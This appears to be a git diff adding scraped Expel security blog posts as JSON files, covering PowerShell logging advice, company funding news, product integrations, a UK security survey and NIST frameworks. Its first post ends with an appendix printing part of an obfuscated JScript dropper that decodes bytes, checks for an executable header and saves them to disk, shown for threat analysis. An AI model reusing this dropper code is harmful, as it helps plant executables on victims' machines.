Note that PowerShell files (.ps1) already open by default in Notepad. Enable Defenders: Increase visibility into PowerShell activity by taking advantage of logging capabilities. Module and ScriptBlock logging provide greater visibility into potential PowerShell attacks. Good: Ensure PowerShell 3.0 (at least) is installed on all Windows systems and enable PowerShell Module logging. Better: Ensure PowerShell 5.0 (at least) is installed on all Windows systems and enable PowerShell ScriptBlock logging and transcription logging. Best: Ensure PowerShell 5.0 (at least) is installed on all Windows systems, enable PowerShell ScriptBlock logging and transcription logging; also make sure Microsoft-Windows-PowerShell%4Operational.evtx is at least 1 GB in size on all systems to aid in an investigation. Appendix A Script content: function anonymous() { function lgnsyjcm9469(lgnsyjcm2900) {return lgnsyjcm2900.length;}function lgnsyjcm262(lgnsyjcm6080){return String.fromCharCode(lgnsyjcm6080);}function lgnsyjcm56(lgnsyjcm458) {var lgnsyjcm62 = [];var lgnsyjcm356 = [];var lgnsyjcm144 = \"\";var lgnsyjcm1495;var lgnsyjcm020;var lgnsyjcm4110 = 0;lgnsyjcm62[0x80] = 0x00C7;lgnsyjcm62[0x81] = 0x00FC;lgnsyjcm62[0x82] = 0x00E9;lgnsyjcm62[0x83] = 0x00E2;lgnsyjcm62[0x84] = 0x00E4;lgnsyjcm62[0x85] = 0x00E0;lgnsyjcm62[0x86] = 0x00E5;lgnsyjcm62[0x87] = 0x00E7;lgnsyjcm62[0x88] = 0x00EA;lgnsyjcm62[0x89] = 0x00EB;lgnsyjcm62[0x8A] = 0x00E8;lgnsyjcm62[0x8B] = 0x00EF;lgnsyjcm62[0x8C] = 0x00EE;lgnsyjcm62[0x8D] = 0x00EC;lgnsyjcm62[0x8E] = 0x00C4;lgnsyjcm62[0x8F] = 0x00C5;lgnsyjcm62[0x90] = 0x00C9;lgnsyjcm62[0x91] = 0x00E6;lgnsyjcm62[0x92] = 0x00C6;lgnsyjcm62[0x93] = 0x00F4;lgnsyjcm62[0x94] = 0x00F6;lgnsyjcm62[0x95] = 0x00F2;lgnsyjcm62[0x96] = 0x00FB;lgnsyjcm62[0x97] = 0x00F9;lgnsyjcm62[0x98] = 0x00FF;lgnsyjcm62[0x99] = 0x00D6;lgnsyjcm62[0x9A] = 0x00DC;lgnsyjcm62[0x9B] = 0x00A2;lgnsyjcm62[0x9C] = 0x00A3;lgnsyjcm62[0x9D] = 0x00A5;lgnsyjcm62[0x9E] = 0x20A7;lgnsyjcm62[0x9F] = 0x0192;lgnsyjcm62[0xA0] = 0x00E1;lgnsyjcm62[0xA1] = 0x00ED;lgnsyjcm62[0xA2] = 0x00F3;lgnsyjcm62[0xA3] = 0x00FA;lgnsyjcm62[0xA4] = 0x00F1;lgnsyjcm62[0xA5] = 0x00D1;lgnsyjcm62[0xA6] = 0x00AA;lgnsyjcm62[0xA7] = 0x00BA;lgnsyjcm62[0xA8] = 0x00BF;lgnsyjcm62[0xA9] = 0x2310;lgnsyjcm62[0xAA] = 0x00AC;lgnsyjcm62[0xAB] = 0x00BD;lgnsyjcm62[0xAC] = 0x00BC;lgnsyjcm62[0xAD] = 0x00A1;lgnsyjcm62[0xAE] = 0x00AB;lgnsyjcm62[0xAF] = 0x00BB;lgnsyjcm62[0xB0] = 0x2591;lgnsyjcm62[0xB1] = 0x2592;lgnsyjcm62[0xB2] = 0x2593;lgnsyjcm62[0xB3] = 0x2502;lgnsyjcm62[0xB4] = 0x2524;lgnsyjcm62[0xB5] = 0x2561;lgnsyjcm62[0xB6] = 0x2562;lgnsyjcm62[0xB7] = 0x2556;lgnsyjcm62[0xB8] = 0x2555;lgnsyjcm62[0xB9] = 0x2563;lgnsyjcm62[0xBA] = 0x2551;lgnsyjcm62[0xBB] = 0x2557;lgnsyjcm62[0xBC] = 0x255D;lgnsyjcm62[0xBD] = 0x255C;lgnsyjcm62[0xBE] = 0x255B;lgnsyjcm62[0xBF] = 0x2510;lgnsyjcm62[0xC0] = 0x2514;lgnsyjcm62[0xC1] = 0x2534;lgnsyjcm62[0xC2] = 0x252C;lgnsyjcm62[0xC3] = 0x251C;lgnsyjcm62[0xC4] = 0x2500;lgnsyjcm62[0xC5] = 0x253C;lgnsyjcm62[0xC6] = 0x255E;lgnsyjcm62[0xC7] = 0x255F;lgnsyjcm62[0xC8] = 0x255A;lgnsyjcm62[0xC9] = 0x2554;lgnsyjcm62[0xCA] = 0x2569;lgnsyjcm62[0xCB] = 0x2566;lgnsyjcm62[0xCC] = 0x2560;lgnsyjcm62[0xCD] = 0x2550;lgnsyjcm62[0xCE] = 0x256C;lgnsyjcm62[0xCF] = 0x2567;lgnsyjcm62[0xD0] = 0x2568;lgnsyjcm62[0xD1] = 0x2564;lgnsyjcm62[0xD2] = 0x2565;lgnsyjcm62[0xD3] = 0x2559;lgnsyjcm62[0xD4] = 0x2558;lgnsyjcm62[0xD5] = 0x2552;lgnsyjcm62[0xD6] = 0x2553;lgnsyjcm62[0xD7] = 0x256B;lgnsyjcm62[0xD8] = 0x256A;lgnsyjcm62[0xD9] = 0x2518;lgnsyjcm62[0xDA] = 0x250C;lgnsyjcm62[0xDB] = 0x2588;lgnsyjcm62[0xDC] 
= 0x2584;lgnsyjcm62[0xDD] = 0x258C;lgnsyjcm62[0xDE] = 0x2590;lgnsyjcm62[0xDF] = 0x2580;lgnsyjcm62[0xE0] = 0x03B1;lgnsyjcm62[0xE1] = 0x00DF;lgnsyjcm62[0xE2] = 0x0393;lgnsyjcm62[0xE3] = 0x03C0;lgnsyjcm62[0xE4] = 0x03A3;lgnsyjcm62[0xE5] = 0x03C3;lgnsyjcm62[0xE6] = 0x00B5;lgnsyjcm62[0xE7] = 0x03C4;lgnsyjcm62[0xE8] = 0x03A6;lgnsyjcm62[0xE9] = 0x0398;lgnsyjcm62[0xEA] = 0x03A9;lgnsyjcm62[0xEB] = 0x03B4;lgnsyjcm62[0xEC] = 0x221E;lgnsyjcm62[0xED] = 0x03C6;lgnsyjcm62[0xEE] = 0x03B5;lgnsyjcm62[0xEF] = 0x2229;lgnsyjcm62[0xF0] = 0x2261;lgnsyjcm62[0xF1] = 0x00B1;lgnsyjcm62[0xF2] = 0x2265;lgnsyjcm62[0xF3] = 0x2264;lgnsyjcm62[0xF4] = 0x2320;lgnsyjcm62[0xF5] = 0x2321;lgnsyjcm62[0xF6] = 0x00F7;lgnsyjcm62[0xF7] = 0x2248;lgnsyjcm62[0xF8] = 0x00B0;lgnsyjcm62[0xF9] = 0x2219;lgnsyjcm62[0xFA] = 0x00B7;lgnsyjcm62[0xFB] = 0x221A;lgnsyjcm62[0xFC] = 0x207F;lgnsyjcm62[0xFD] = 0x00B2;lgnsyjcm62[0xFE] = 0x25A0;lgnsyjcm62[0xFF] = 0x00A0;do {lgnsyjcm1495 = lgnsyjcm458[lgnsyjcm4110];if (lgnsyjcm1495 < 128) {lgnsyjcm020 = lgnsyjcm1495;}else {lgnsyjcm020 = lgnsyjcm62[lgnsyjcm1495];}lgnsyjcm356.push(lgnsyjcm262(lgnsyjcm020));lgnsyjcm4110 += 1;} while (lgnsyjcm4110 < lgnsyjcm9469(lgnsyjcm458));lgnsyjcm144 = lgnsyjcm356.join(\"\");return lgnsyjcm144;}function lgnsyjcm15(lgnsyjcm287) {return new ActiveXObject(lgnsyjcm287);}function lgnsyjcm7522() {return Math.floor(Math.random() * 65536);}function lgnsyjcm4677(lgnsyjcm387, lgnsyjcm4315, lgnsyjcm7403, lgnsyjcm1632, lgnsyjcm4299){var lgnsyjcm963;try {var lgnsyjcm5310 = lgnsyjcm598(lgnsyjcm387);var lgnsyjcm081 = lgnsyjcm894(lgnsyjcm5310, lgnsyjcm7403, lgnsyjcm1632);lgnsyjcm5310 = 0;if (lgnsyjcm4299 === 1 && lgnsyjcm081[0] !== 0x4D && lgnsyjcm081[1] !== 0x5a){return 0;}var lgnsyjcm9801 = lgnsyjcm15(lgnsyjcm2656(lgnsyjcm28, lgnsyjcm8, lgnsyjcm4));lgnsyjcm9801.open();lgnsyjcm9801.position = 0;lgnsyjcm9801.type = 2;lgnsyjcm9801.charset = 437;lgnsyjcm9801.writeText(lgnsyjcm56(lgnsyjcm081));lgnsyjcm081 = 0;lgnsyjcm9801.saveToFile(lgnsyjcm4315);lgnsyjcm9801.close();lgnsyjcm963 = 1;} catch (lgnsyjcm265) {return 0;}return lgnsyjcm963;}function lgnsyjcm400() {try {lgnsyjcm0147.lgnsyjcm786;return true;} catch(lgnsyjcm27) {if (typeof WScript === 'object') {return true;}lgnsyjcm481();}}function lgnsyjcm206(){var lgnsyjcm681;var lgnsyjcm4718;try{lgnsyjcm681 = lgnsyjcm15(lgnsyjcm2656('EdT:2)?+6**kP>Yj', lgnsyjcm8, lgnsyjcm4));lgnsyjcm4718 = lgnsyjcm681.RegRead(lgnsyjcm2656('rz%I07urKoW0mJVbfPQ=}Kp;]cNjAFcRVlW#ckgw7%I>(,I5,dv&KR/,^kH+9*p=/6*dFQ+mC2T|j[,;T)+FE', lgnsyjcm8, lgnsyjcm4));if (!lgnsyjcm4718) {return false;}return lgnsyjcm4718;} catch(lgnsyjcm0598){return false;}}function lgnsyjcm481(){var lgnsyjcm9032 = \"\\;var lgnsyjcm4797;var lgnsyjcm867;var lgnsyjcm337 = \"\"\"\";var lgnsyjcm118 = '\"\"';var lgnsyjcm449 = \"\"\"\";try {lgnsyjcm4797 = lgnsyjcm15(lgnsyjcm2656(lgnsyjcm737" +} \ No newline at end of file diff --git a/more-good-news-in-still-unusual-times.json b/more-good-news-in-still-unusual-times.json new file mode 100644 index 0000000000000000000000000000000000000000..79d43907f53ef9b99efd368ce6a9383251334472 --- /dev/null +++ b/more-good-news-in-still-unusual-times.json @@ -0,0 +1,6 @@ +{ + "title": "More good news in still unusual times", + "url": "https://expel.com/blog/more-good-news-in-still-unusual-times/", + "date": null, + "contents": "Subscribe \u00d7 EXPEL BLOG More good news in still unusual times Expel insider \u00b7 4 MIN READ \u00b7 DAVE MERKEL, YANEK KORFF AND JUSTIN BAJKO \u00b7 NOV 18, 2021 \u00b7 TAGS: Cloud security / Company news / MDR Here comes the unicorn swag. 
Expel is abuzz with the recent announcement that we\u2019ve officially reached \u201cunicorn\u201d status. Even though many of us are still working from our homes during this infernal lingering global pandemic \u2013 the excitement is palpable. Our $140.3 Million Series E financing is an incredible gust of wind in our sails. CapitalG , Alphabet\u2019s independent growth fund, and Paladin Capital Group co-led another round of financing with support from our existing investors : Greycroft, Index Ventures and Scale Venture Partners. We\u2019re also excited to welcome new investors participating in this round: Cisco Investments and March Capital. There\u2019s a long list of things we\u2019re grateful for that we\u2019ll be sharing with our family and friends this Thanksgiving. We were named a Leader in The Forrester Wave\u2122: Managed Detection And Response, Q1 2021 and Leader in IDC MarketScape for U.S. Managed Detection and Response Services Market 2021 Vendor Assessment (doc #US48129921, August 2021). We won Exabeam\u2019s MSSP/MDR U.S. and North America partner of the year award and have been listed on a number of FORTUNE\u2019s best places to work lists. We were listed on the AWS Marketplace where people can buy our 24\u00d77 MDR service for their AWS (and hybrid) environments, and continued forming strong partnerships with our community . And we did it all while maintaining quarterly NPS scores of over 80 despite our rapid growth. Oh, and we\u2019re now a tech startup that reached a $1 billion valuation in just five years. That\u2019s really freakin\u2019 cool. That puts us among 32 other cybersecurity unicorns \u2013 nine of which have also reached this milestone in 2021. That\u2019s 32 out of more than 3,500 cybersecurity companies. And that\u2019s just in the U.S. It\u2019s humbling. We\u2019re honored to be listed among these companies, and to know that our investors continue to place their bets on us \u2013 understanding that we\u2019ll use these resources to continue building something that sets us apart from other MDR vendors and defines the future of the modern security operations center (SOC). Since inception, we\u2019ve wanted to create space for people to do what they love about security. And we\u2019re doing it! Our customers love it. Our investors see that, and they\u2019re doubling down. Could we have done this alone? No way. The fact that we did that during some truly unusual and painful times can\u2019t be overlooked. We\u2019re eternally grateful to our team, customers and partners. Locking arms to climb the mountain That\u2019s been our motto for the past year and a half. We end every all-hands meeting with the reminder that we\u2019ll make it \u2013 we just need to lock arms as we climb this mountain. Because we get it done together. It\u2019s not about ninjas and rockstars; it\u2019s about the strength of our team. We set out to make security as accessible as the internet, and this past year put all of us to the test. And the Expel team didn\u2019t just rise to the occasion \u2013 we were named among the leaders in the industry. Recognition from Forrester and IDC is an honor and further validation that even during times of chaos, we can and will deliver on our mission to help people get back to doing what they love. We can\u2019t say it enough: we couldn\u2019t have done this without our customers and partners. Together, we\u2019ve built something that goes beyond world-class security. 
And we\u2019ve been blown away by the enthusiastic outreach we\u2019ve received from other security leaders and can\u2019t wait to build upon and expand those partnerships. Our collective curiosity allowed us to look around corners, create community outside Expel and build something that\u2019s changing the industry. You might have heard (and read ) about how we focus on optimizing the human moment. So, what does that really mean? We\u2019re not just talking about using tech to handle what can be automated so our crew can shine in the moments that need a human mind. We\u2019re making space for Expletives to grow and show up to work authentically. We\u2019re giving our customers time back in their day so they can focus on what makes them look forward to coming into work. We\u2019re discovering what\u2019s next and creating solutions with our partners. In 2020, we all found ourselves at the foot of a tall and scary-looking mountain. But this group locked arms and we climbed up. It confirmed what us founders already knew \u2013 with this crew, we can climb any mountain. Forging ahead As our customers navigate still uncertain times, they can be certain that we\u2019ll have their back. This new investment will help us continue to keep our customers safe while also pioneering a path forward. We\u2019re growing quickly in both size and in the myriad ways in which we help keep our customers safe. Our industry has a lot to consider as we look to what\u2019s next: ransomware attacks are on the rise, phishing tactics are evolving and orgs of all sizes are waking up in the cloud. And those are just a few examples. These aren\u2019t easy challenges to tackle. But we have the utmost faith in our team and the outstanding collaboration we experience with our existing customers. The creative minds and technical skills that Expletives bring to the table will guarantee that we\u2019ll make very good use of this money. We\u2019ll continue to expand our cloud security offerings, grow our sales operations, explore going international, add to our rapidly growing list of security partners and throw open the gates that have locked out so many people from entering the cybersecurity field. What this all means is that we\u2019ll keep building seriously cool $#*! . We\u2019ll keep bringing in new ideas and perspectives to the team through our Diversity, Equity and Inclusion (DEI) recruitment initiatives \u2013 or Equity, Inclusion and Diversity (EID) as we call it here at Expel \u2013 that will keep us at the front of the pack. And thanks to our incredible crew, we\u2019ll continue to dramatically improve the efficacy of detection and response. Expletives will continue problem solving with our customers and partners \u2013 keeping a close eye on the trends that impact our customers and inspire us to build new capabilities. And we\u2019ll keep sharing the insights we gather on a regular basis with the community through blogs , attack vectors reports and by creating platforms for our crew to share their experiences and knowledge with the security community. We\u2019re proud of the ground we\u2019ve covered this past year. And we\u2019re even more excited about where we\u2019re going next. Want to find out more about what we\u2019re doing next? We\u2019d love to chat ." 
+} \ No newline at end of file diff --git a/new-integrations-to-manage-overall-business-risk.json b/new-integrations-to-manage-overall-business-risk.json new file mode 100644 index 0000000000000000000000000000000000000000..caf0ba30582258bf810868ea8cd50bc9227fc522 --- /dev/null +++ b/new-integrations-to-manage-overall-business-risk.json @@ -0,0 +1,6 @@ +{ + "title": "new integrations to manage overall business risk", + "url": "https://expel.com/blog/integrations-roundup-new-integrations-to-manage-overall-business-risk/", + "date": "Mar 29, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG Integrations roundup: new integrations to manage overall business risk Engineering \u00b7 3 MIN READ \u00b7 ALAN NEWMAN \u00b7 MAR 29, 2023 \u00b7 TAGS: Cloud security / Company news / Tech tools At Expel, we take a bring-your-own (BYO) tech approach to security operations. Instead of requiring customers to buy and implement specific tech, we integrate with the security tools they already have to maximize their existing investment. This also gives our customers more control over the security tech they use now and in the future. Our integration portfolio has more than 100 integrations spanning cloud, Kubernetes, SaaS, SIEM, network, endpoint technologies, and more. We\u2019re continuously adding new integrations to the portfolio to ensure we\u2019re integrating with the right tech to manage risk across your business. But risk isn\u2019t limited to security alone. If the last few years have taught us anything, it\u2019s that risk is a business-wide challenge that spans all people, processes, and technology within the organization. That\u2019s why our strategy with our security operations platform, Expel Workbench\u2122, is to integrate with all the applications that present a layer of risk to your business, not just security tech. That\u2019s why we\u2019re excited to share that we\u2019ve built new integrations with popular business applications, including Slack, Salesforce, Workday, and GitLab, so customers can manage overall business risk all within the Expel Workbench. Security tech is still a fundamental component of the risk equation, which is why we\u2019ve also released new integrations with Microsoft Intune and ExtraHop. Slack Slack is a corporate instant messaging system that supports messaging, voice calls, media, and files through private chats, shared groups, or even as part of communities. As hybrid work is the norm for most organizations, the amount of highly sensitive data being communicated through Slack has substantially increased, making it a new vector of risk. With our new Slack integration, the Expel Workbench has detections for user logins from suspicious countries, IPs, and from TOR domains in addition to monitoring risky configuration changes in the platform. We also support DUET detections for configuration changes such as when a user is granted an owner role. Salesforce Salesforce is a cloud-based customer relationship management platform. Sales, marketing, and success teams use Salesforce heavily to store prospect and customers\u2019 personally identifiable information (PII). That PII is critical for effective go-to-market outreach, but also presents a risk to both the business and the customer if exposed. 
Our new Salesforce integration, working with Salesforce Shield and Real-Time Event Monitoring, identifies suspicious authentication requests including both the user and IP address behind the authentication event, credential stuffing and session hijacking attacks, and anomalous API events. It creates a timeline of the event, and enriches with context like IP address, country, domain name, user agent string and more, and then scopes for related alerts. The gathered security signals and audit events are also used to provide additional context that helps our analysts and robots investigate alerts from other security technologies. Workday Workday is a cloud-based enterprise resource planning (ERP) technology used for managing human resource functions, financial analysis, and analytical solutions, among other processes. The human resource (HR) team typically uses Workday to manage employee information, like compensation, benefits, social security information, and more. While Workday may make the HR\u2019s team managing employee information easier, it\u2019s now become a database of sensitive employee information. Our new Workday integration monitors suspicious IP addresses, domain names, and user agent strings. GitLab GitLab is a DevOps platform that helps in software development. It provides the ability to collaborate, secure, and release software using easy-to-manage tools. It\u2019s one of the most popular platforms of its kind, and developers are increasingly building, releasing, and deploying applications that can expose the business to risk without the right security controls in place. Our new integration monitors GitLab audit events to identify suspicious authentication requests, including IP address, country, domain name, user agent strings, as well as monitoring risky configuration changes done in the platform. Microsoft Intune Microsoft Intune (formerly Windows Intune) is a cloud-based endpoint management solution. It manages user access and simplifies app and device management across many devices, including mobile devices, desktop computers, and virtual endpoints. Expel Workbench now integrates with Microsoft Intune to quickly gather investigative data for triage and investigation of alerts to deliver high-quality and expedient containment and remediation actions \u2013 as well as monitoring risky configuration changes done in the platform. ExtraHop ExtraHop Reveal(x) provides AI-based network intelligence that stops advanced threats across cloud, hybrid, and distributed environments. The core of ExtraHop technology is a passive network appliance that uses a network tap or port mirroring to receive network traffic. We now integrate with ExtraHop Reveal(x) and monitor the platform\u2019s security alerts. Integrated platform to manage overall business risk Cybersecurity isn\u2019t an isolated discipline. Organizations are constantly adopting new technologies to support their missions, and this means that the threat landscape has grown in size and sophistication. Risk spans the business, so we\u2019re excited to provide even more opportunities to manage this business risk, all from the Expel Workbench platform. To learn more about these integrations, please visit our integrations guide ." 
+} \ No newline at end of file diff --git a/new-uk-cybersecurity-report-top-5-findings.json b/new-uk-cybersecurity-report-top-5-findings.json new file mode 100644 index 0000000000000000000000000000000000000000..db59c6ad4dc8d0db605420d43ba9f0e03ceac377 --- /dev/null +++ b/new-uk-cybersecurity-report-top-5-findings.json @@ -0,0 +1,6 @@ +{ + "title": "New UK cybersecurity report: top 5 findings", + "url": "https://expel.com/blog/new-uk-cybersecurity-report-top-5-findings/", + "date": "Apr 19, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG New UK cybersecurity report: top 5 findings Security operations \u00b7 3 MIN READ \u00b7 CHRIS WAYNFORTH \u00b7 APR 19, 2023 \u00b7 TAGS: MDR We recently surveyed 500 IT decision-makers (ITDMs)\u2014including IT and security execs, directors, and managers; owner/proprietors; partners; board chairs and members; chief executives; and managing directors\u2014to get a better sense for the state of cybersecurity in the UK. The report, The UK cybersecurity landscape: challenges and opportunities , was released today. Some of the findings align with our expectations, while others surprised us. And while at first glance, the findings may paint a scary picture, there\u2019s lots of opportunities for security leadership and teams to improve their strategies and capabilities. Here\u2019s a preview of our top findings. 1: ITDMs rate cybersecurity third on their list of concerns, but those in IT-specific roles see it as the biggest problem. It\u2019s rough going in the UK right now, as businesses deal with (among other things) the cost-of-living crisis, the looming prospect of a recession, and ever-changing customer expectations. Despite these worries, half of all respondents highlighted security (50%) as a top challenge for 2023, behind energy prices (61%) and the economic climate (54%). However\u2014perhaps owing to their proximity to the daily activity of the security operations centre (SOC)\u2014IT departments see it as the most daunting challenge they face. Respondents also noted worries over sustainability, soaring customer expectations, and a global talent shortage. 2: A significant amount of the allotted security budget is going unused. ITDMs surveyed report a median annual security budget of \u00a3200,000, which (predictably) varies by company size. Surprisingly, though, the survey found that, on average, 26.7% of allocated security budgets went unspent. This equals an average of \u00a353,400 in available cybersecurity budget was unused in 2022. Twenty-one percent of respondents reported spending 50% or less of their security budgets. 3: U.K. organisations face tremendous security-related fatigue. Security teams have their hands full. In addition to fighting the bad guys (investigating and researching alerts, responding to cybersecurity incidents, threat hunting, etc.), they\u2019re also asked to conduct cyber hygiene training for employees, implement and integrate new security tools, and, by the way, train themselves so they can stay abreast of the latest hacker best practices (or perhaps we\u2019d call these worst practices). To complicate every step in the journey, they spend a huge chunk of time on low-priority alerts and false positives. This, in turn, leads to the much-discussed phenomenon of alert fatigue, which occurs when a constant barrage of alerts hits the SOC\u2019s queue and the team either can\u2019t deal with the volume or becomes de-sensitised to them. The result? Analysts either take longer to respond or ignore the alerts completely. 
Adding insult to injury is a talent shortage of about 3.4 million security professionals, a number roughly equal to the combined population of the cities of Birmingham, Glasgow, Liverpool, Bristol, and Manchester, and representing an increase of more than 26% over 2021, per (ISC)\u00b2. This results in defenders finding their cybersecurity work frequently infringing on their private lives. Ninety-three percent of respondents say work related to IT management and cybersecurity risk has forced them to cancel, delay, or interrupt personal commitments. Thirty-four percent of the total say this happens all or most of the time, as do 43% of IT team members and 38% of CIOs/CTOs. (Many organisations, especially in the 250-1,000 employee tier, don\u2019t have a dedicated security team, and in these cases, the IT team is responsible for security operations.) What impact can this eventually have? 4: The resulting burnout threatens security and causes staff turnover. A distressing number of those charged with safeguarding the business against cyberattackers experience burnout (61% of all respondents and a whopping 70% of IT and security pros say they or members of their teams are victims). That those in the trenches\u2014security and IT teams\u2014report higher numbers than everyone else suggests the problem may be worse than company leaders realize. As we know, burnout is unsustainable. In the absence of internal remedies, the risk that workers will exit increases. In this case, respondents believe there\u2019s better than a 50% chance they\u2019ll lose people in the coming year. Of particular interest: these folks report they\u2019re thinking of leaving the \u201ccybersecurity industry,\u201d not just their current company. This should be a very concerning finding for U.K. organisations, as it suggests the already thin talent pool could shrink further. 5: Because of all these challenges, UK organisations tend toward a tactical and reactive approach vs. a forward-looking, strategic one. Thirty-eight percent of respondents indicated mandatory regulation as the most common driver for further security investment. The next two responses will also sound familiar to security leaders: responding to a breach (32%) and improving security for maturing businesses (29%) are the next most common drivers of investment. Fewer organisations seem motivated by customer-driven requirements (25%) and executive input (22%). The overall picture is of an industry operating as largely responsive and tactical vs. proactive and strategic. And in looking at the rest of the findings in our research, it\u2019s no wonder! Cybersecurity is already a hard job \u2013 the added challenges we found make it even harder! Given these challenges, it\u2019s very difficult for security leaders to shift their mindset, but organisations get the best outcomes when engaged leadership sees security budget as a business-enabling investment instead of a cost centre and commits to evolving around the user. The full report is, in some places, a confirmation of many ITDM concerns. In others, it\u2019s a bracing splash of cold water. In all cases, it\u2019s insightful and provides useful guidance for those plotting their security strategies for the coming year and beyond. We encourage you to download your copy today and spend a few minutes with it (it\u2019s actually briefer than you might expect, and also includes a football analogy you might appreciate). If you have comments or questions, please drop us a line."
+} \ No newline at end of file diff --git a/nist-csf-a-new-interactive-tool-to-track-your-progress.json b/nist-csf-a-new-interactive-tool-to-track-your-progress.json new file mode 100644 index 0000000000000000000000000000000000000000..56ca827ca480e25aa74b2ade8031bc6431699e86 --- /dev/null +++ b/nist-csf-a-new-interactive-tool-to-track-your-progress.json @@ -0,0 +1,6 @@ +{ + "title": "NIST CSF: A new interactive tool to track your progress", + "url": "https://expel.com/blog/nist-csf-new-interactive-tool-track-progress/", + "date": "Mar 3, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG NIST CSF: A new interactive tool to track your progress Security operations \u00b7 2 MIN READ \u00b7 BRUCE POTTER \u00b7 MAR 3, 2020 \u00b7 TAGS: CISO / Framework / How to / NIST / Planning If you\u2019ve ever checked out Expel on LinkedIn or Twitter, or you\u2019ve ever read one of our blog posts, then you know we\u2019re big fans of the NIST Cybersecurity Framework (CSF). Why we like the NIST CSF There\u2019s a lot to like about the NIST CSF: A regulatory-agnostic framework like the CSF helps drive more mature security programs. With the CSF, companies can easily and consistently assess where they are today and where they want to be from a cybersecurity standpoint. It\u2019s a great way to democratize security and bring risk management to the masses. We like that it demystifies a complex subject and allows less technical orgs to transact on security in a meaningful way. It helps orgs of all shapes and sizes measure and report on their respective security programs. This might be our favorite thing about the NIST CSF \u2014 the framework gives security professionals, regardless of the organization they\u2019re in, a standardized way to measure and talk about their security maturity, and the progress they\u2019re making on those efforts. Whether you\u2019re making the case for additional security budget or presenting to your board of directors, the NIST CSF gives you a tangible and effective way to do that. Making the NIST CSF into something actionable for your org While there are lots of positives about the NIST CSF, we get that putting it into practice is sometimes easier said than done. How exactly do you take a framework and implement it, let alone track how you\u2019re doing? We heard you. And that\u2019s why we created our NIST CSF self-scoring tool a few years ago, which you can download right here. Now available: the NIST CSF dashboard in Expel Workbench\u2122 If you\u2019re an Expel customer, we\u2019ve got an even better way for you to take advantage of our NIST CSF self-scoring tool. We just introduced an interactive version of our NIST CSF self-scoring tool right in Expel Workbench\u2122. Now it\u2019s even easier to use the CSF, measure your progress and report on it \u2026 all of which is done through the same interface you use every day to manage your org\u2019s security. Take a look: Here\u2019s the NIST CSF Dashboard for Expel Workbench\u2122, available right in the same interface you use to keep tabs on your org\u2019s security. Here\u2019s a closer look at the dashboard and the self-scoring mechanisms. See it for yourself Here at Expel we use the NIST CSF self-scoring tool to measure our own progress when it comes to security, and lots of our customers use it too. They\u2019ve told us the tool is easy to use, effective and helps them measure and track their security programs. Want to check out Expel Workbench\u2122 and see how it can help you streamline your security operations?
Give us a shout \u2014 we\u2019d love to talk." +} \ No newline at end of file diff --git a/nist-s-new-framework-riding-the-wave-of-re-imagining.json b/nist-s-new-framework-riding-the-wave-of-re-imagining.json new file mode 100644 index 0000000000000000000000000000000000000000..ead422366ee0f7003e9e15332869081de7675752 --- /dev/null +++ b/nist-s-new-framework-riding-the-wave-of-re-imagining.json @@ -0,0 +1,6 @@ +{ + "title": "NIST's new framework: Riding the wave of re-imagining ...", + "url": "https://expel.com/blog/nist-new-framework-riding-wave-reimagining-privacy/", + "date": "May 21, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG NIST\u2019s new framework: Riding the wave of re-imagining privacy Security operations \u00b7 4 MIN READ \u00b7 BRUCE POTTER \u00b7 MAY 21, 2019 \u00b7 TAGS: CISO / Managed security / NIST / Planning Let me set the scene for you: Everyone is stumbling around in the dark, trying to figure out what the heck \u201cprivacy\u201d really means and what they should do about it. Right now, we\u2019re living in a gray, soulless world of privacy compliance \u2026 which doesn\u2019t involve much independent thought or risk-based decision making. All of a sudden, our hero \u2014 the National Institute of Standards and Technology (NIST) \u2014 rides in with its Privacy Framework. And all is right in the world again. The sun is shining, birds are singing and the flowers are blooming. Oh, and all the characters in this story are now off and running to develop their own meaningful and fulfilling privacy risk management program. End scene and cue the happy music. Sure, this movie might not ever make it to the big screen, but for security nerds like us the development of NIST\u2019s forthcoming Privacy Framework is pretty award-worthy. It\u2019s going to revolutionize how most of us think about privacy. What\u2019s the NIST Privacy Framework solving for? Many companies are only starting to come to grips with privacy thanks to new privacy regimes like the EU\u2019s GDPR and California\u2019s CCPA. And when you come to grips with a regulation, it typically looks a lot like compliance. \u201cWhat boxes do I need to check in order to be compliant?\u201d you might ask yourself. And once you\u2019re compliant, you\u2019re Good Enough\u2122 and you move onto the next problem. While taking a compliance-driven approach might feel like the equivalent of hitting an \u201ceasy\u201d button, there\u2019s one big problem: It leaves gaps in your org\u2019s privacy posture that you\u2019re probably not even aware of. The \u201ccompliance = security\u201d mindset has been a problem for years, and industry analysts and journalists love reminding us after every breach that simply being compliant isn\u2019t enough. Turns out that privacy is no different. Enter NIST and its forthcoming Privacy Framework. You\u2019ve probably heard of NIST\u2019s Cyber Security Framework (CSF) \u2014 it was developed a few years ago in response to an Executive Order issued by former President Obama. Many organizations use the CSF to get their security house in order; it\u2019s an open document, it\u2019s comprehensive, it\u2019s approachable and companies of all shapes and sizes can use it. NIST recognized that privacy is a domain that needs a similar framework to help guide orgs big and small to better outcomes. So they\u2019ve taken it upon themselves to create a Privacy Framework modeled after the CSF. And when I say \u201cmodeled,\u201d I mean both in process and in form. 
The original CSF was constructed through a series of workshops held around the country where NIST solicited feedback on various work products and refined the CSF with the public\u2019s involvement until we landed where we are today. They\u2019re using the exact same process with the Privacy Framework. A draft document was released earlier in May and I just returned from Atlanta where they held their workshop to discuss the draft. The next workshop is happening in July in Boise, with more interim products and documents likely to be released in the coming months. In form, the draft document looks very similar to the CSF. There are five core functional areas, and each functional area is broken down into categories and sub-categories. Three of the five CSF core functional areas \u2014 \u201cIdentify,\u201d \u201cProtect\u201d and \u201cResponse\u201d \u2014 are the same as the CSF, but in the Privacy Framework they\u2019ve rounded out the list by adding \u201cControl\u201d and \u201cInform.\u201d When you read the sub-categories, you\u2019ll see that many were lifted directly from the CSF and the word \u201csecurity\u201d replaced with \u201cprivacy.\u201d This is an overt recognition that security is an integral part of privacy and vice versa. These two frameworks will be intertwined in their structure and their execution within organizations. How orgs will use the NIST Privacy Framework This new effort from NIST is a comprehensive framework that anyone can use to build a true privacy risk program, not just a compliance program. This means you can use the Privacy Framework to take a holistic approach to privacy instead of playing whack-a-mole with various controls in different regimes. And the integration with the CSF opens the door to bringing together a diverse group of stakeholders in your org to participate in strategizing about both security and privacy. Lawyers, data scientists, security professionals, privacy engineers, social scientists and executives will need to (and should) come together to address privacy at an organizational level. This Privacy Framework represents the democratization of 